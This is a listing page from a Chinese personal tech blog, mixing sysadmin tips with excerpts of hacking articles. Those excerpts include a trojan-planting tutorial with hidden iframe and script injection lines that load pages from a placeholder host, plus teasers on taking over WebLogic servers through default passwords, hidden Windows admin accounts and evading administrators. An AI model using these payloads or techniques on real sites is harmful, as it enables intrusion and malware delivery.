夜火博客 个人的碎碎念收集箱

HTTP 500 - 内部服务器错误 解决方法

在学校调试asp程序,或者服务器课上配置IIS,有时候就会碰到这该死的“HTTP 500 - 内部服务器错误”,怎么都搞不定,让夜火我好是火大,刚好在AK那看到这个HTTP 500 - 内部服务器错误 解决方法,转来记录之:

培训销售人员安装asp.net运行环境,真是各种情况都遇到了,IIS安装完成,一运行出现“HTTP 500 - 内部服务器错误”,网上找了一圈,处理方法那个叫复杂,在研究完复杂方法之后,发现只要三步就可以解决问题了。

标签: 技术类技巧

作者:夜火 分类:技术文章 浏览:6293 评论:1

Linux 下用ps查找进程并用kill终止命令详解

最近夜火我在折腾Ubuntu 9.04系统,直接硬盘安装在学校的机器上,已经折腾了3天了。

第一天全放在了重装windows XP和安装整理必要文件上了;第二天安装了GRUB4DOS,硬盘引导加载 Ubuntu-9.04-desktop-i386.iso 文件安装Ubuntu,但是装好之后一直memtest内存测试,引导不进系统;这第三天又捣鼓了1天的grub,最终还是不行,没有vmlinuz-2.6.28-11-generic文件。明天继续。。。

学校的破网络,只能上百度首页和看PPS,其他什么都不能干,资料要回家查,软件要U盘带,估计装好ubuntu也apt-get不到什么东西,不过还是要折腾,谁让咱移民去了不折腾会死星那。当然,在折腾的过程中,学到了不少东西。

趁着空闲,收集一些linux实用技巧,以备后查:Linux 下用ps查找进程并用kill终止命令详解

标签: Linuxpskill

作者:夜火 分类:技术文章 浏览:52835 评论:0

Ubuntu 小技巧10则

Linux是强大的,Ubuntu又是Linux桌面发行版里最流行的版本,Linux或Ubuntu里的功能有很多,也许有一些很好用的你不知道的技巧/功能/软件藏身在系统的某处,这里转来 Ubuntu 小技巧10则 ,分享给大家。

原文作者近期刚开始与他的合作者合著一本关于Ubuntu技巧的书,目前定名为《Ubuntu功夫》。不过这本书可能要到明年才会出版,作者先给出了以下10条技巧。这些技巧并不一定仅仅是在Ubuntu上才可以使用,只是在Ubuntu这种Linux发行版下经过验证的。

aptitude 命令快速参考 - Debian系统中另一个强大的包管理工具

aptitudeapt-get 同样是 Debian 及其衍生系统中功能极其强大的包管理工具。很多命令都类似于 apt-get ,因此很容易掌握。

但与 apt-get 不同的是,aptitude 在处理依赖问题上更佳一些。像 aptitude 在删除一个包时,会同时删除本身所依赖的包。这样,系统中不会残留无用的包,整个系统更为干净。

以下是一些常用 aptitude 命令,仅供参考:……

详解挂马方法和技巧

1.挂马的N种方法

(1) HTML挂马法
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为 document.write(’http://www.xxx.com/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML  = top.document.body.innerHTML + ‘ <inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意:是原来的网页种要有body标签。

(3)......

iframe的防插与强插

iframe的防插与强插,网上通用的防插那版是(子):

if(top.location != self.location){
top.location = self.location;
}

强插方案为(父):
 

var location="";

其中这个location是对被赋值的top.location方法的覆盖,导致方法失效。

......

标签: iframe技术类

作者:夜火 分类:技术文章 浏览:1054 评论:5

了解CSS挂马技术及相应防范方法

黑客们发现发现,用来制作网页特效的CSS代码,也可以用来做CSS挂马

随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页特效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来。

WebLogic简单抓鸡大法

题目:WebLogic简单抓鸡大法
作者:Mickey [I.S.T.O.]&hackest [H.S.T.]

此文章已发表在《黑客X档案》2008年第11期杂志上
后经作者发布在博客上,如转载请务必保留此信息!


Tomcat估计给很多人带来了N多肉鸡服务器了吧,直接扫描弱口令,进入Tomcat管理后台,上传Webshell就得到一台肉鸡服务器了,操作之简单,效率之高,实在是抓鸡必备!不过这次要介绍的是一个类似于Tomcat的JSP支持平台WebLogic漏洞的简单利用(其实也是默认口令),相比Tomcat会稍微复杂一些,不过操作起来也是比较容易的。

Windows中多种隐藏超级用户方法

一、如何在图形界面建立隐藏的超级用户

  图形界面下适用本地或开3389终端服务的肉鸡上。以前我提到过的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows 2000有两个注册表编辑器

标签: 技术类

作者:夜火 分类:技术文章 浏览:1907 评论:0

教你怎么使用服务器才不会被管理员发现

渗透的服务器也多了,起初都是给肉鸡装上鸽子啊,PCSHARE什么的,以为这样就OK了,但是往往到了第二天就不翼而飞,我起初很纳闷,我的后门都是免X的,管理员是怎么样发现我的踪迹的呢?后来慢慢积累了些心得,现发出来跟大家分享一下。

标签: 技术类

作者:夜火 分类:技术文章 浏览:2351 评论:0

Perl版NetCat(NC)

这个机器有多古老?4.6-RELEASE FreeBSD,没有gcc,没有make,连系统都乱七八糟的,port都不好使,pkg_add -r安装包都会有问题,真是无语了,还好有安装了一个Perl 5.8.8。修理Port花了半天时间,硬是没搞好。想想也不划算,把紧急要用的一些小工具花一会儿功夫自己做一个出来算了,于是有了这个简单的Perl 版NC,不过我没支持-e参数,用不着。

标签: Perl技术类

作者:夜火 分类:技术文章 浏览:1259 评论:0

Clickjacking - 点击劫持漏洞技术内幕

Clickjacking - 点击劫持漏洞技术内幕

Clickjacking是OWASP_NYC_AppSec_2008_Conference的一个保密的议题,以下是一些攻击的描叙:

  当你访问一个恶意网站的时候,攻击者可以控制你的浏览器对一些链接的访问,这个漏洞影响到几乎所有浏览器以及所有版本的Flash等浏览器相关的第三方软件,除非你使用lynx一类的字符浏览器。